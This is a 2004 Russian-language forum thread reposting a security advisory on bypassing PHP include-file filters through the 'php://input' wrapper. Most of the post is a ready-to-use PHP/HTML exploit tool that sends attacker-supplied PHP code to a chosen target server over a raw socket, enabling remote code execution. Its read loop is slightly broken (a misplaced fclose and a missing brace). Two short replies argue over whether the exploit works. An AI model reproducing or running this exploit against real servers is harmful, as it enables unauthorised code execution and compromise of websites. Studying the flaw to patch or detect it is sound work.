SMax Опубликовано 31 мая, 2004 Жалоба Поделиться Опубликовано 31 мая, 2004 http://www.securitylab.ru/45506.html Обход фильтрации включаемых файлов в PHP Программа: PHP 3.0.13 и более поздние версии Опасность: Средняя Наличие эксплоита: Да Описание: Уязвимость обнаружена в PHP. Удаленный пользователь может обойти фильтры включаемых файлов. Удаленный пользователь может обойти фильтры, обрабатывающие 'http://' или 'ftp://' строки, используя 'php://input' URL и посылая PHP код в POST запросах. Пример/Эксплоит: °°°°°°°° Exploit °°°°°°°°° <------------ cut here ----------------> <form action="" methode="post" > target server : <input type="text" name="server" ><br> file : <input type="text" name="file" ><br> exec : <input type="text" name="cmd" ><br> <INPUT type="submit" value="send"> </form> <? if($cmd){ $message = "POST /".$file."php://input HTTP/1.1\r\n"; $message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwav e-flash, */*\r\n"; $message .= "Accept-Language: fr\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "Accept-Encoding: deflate\r\n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)\r\n"; $message .= "Host: ".$server."\r\n"; $message .= "Content-length: ".strlen( $cmd )."\r\n"; $message .= "Connection: Keep-Alive\r\n"; $message .= "Cache-Control: no-cache\r\n"; $message .= "\r\n"; $message .= $cmd."\r\n"; $fd = fsockopen( $server, 80 ); fputs($fd,$message); while(!feof($fd)) { echo fgets($fd,1280); fclose($fd); ?> <------------ cut here ----------------> target server = "www.exemple.com" file = "index.php?page=" exec = "<? phpinfo(); ?>" URL производителя: http://www.php.net/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. Ссылка на комментарий Поделиться на другие сайты Поделиться
Гость Guest Опубликовано 31 мая, 2004 Жалоба Поделиться Опубликовано 31 мая, 2004 Данная уязвимость нам не страшна. Эксплоит не работает. Ссылка на комментарий Поделиться на другие сайты Поделиться
SMax Опубликовано 31 мая, 2004 Автор Жалоба Поделиться Опубликовано 31 мая, 2004 Данная уязвимость нам не страшна. Эксплоит не работает. Кому нам? Работает, но не везде. http://fr2.php.net/manual/en/wrappers.php.php Ссылка на комментарий Поделиться на другие сайты Поделиться
Рекомендуемые сообщения
Для публикации сообщений создайте учётную запись или авторизуйтесь
Вы должны быть пользователем, чтобы оставить комментарий
Создать учетную запись
Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!
Регистрация нового пользователяВойти
Уже есть аккаунт? Войти в систему.
Войти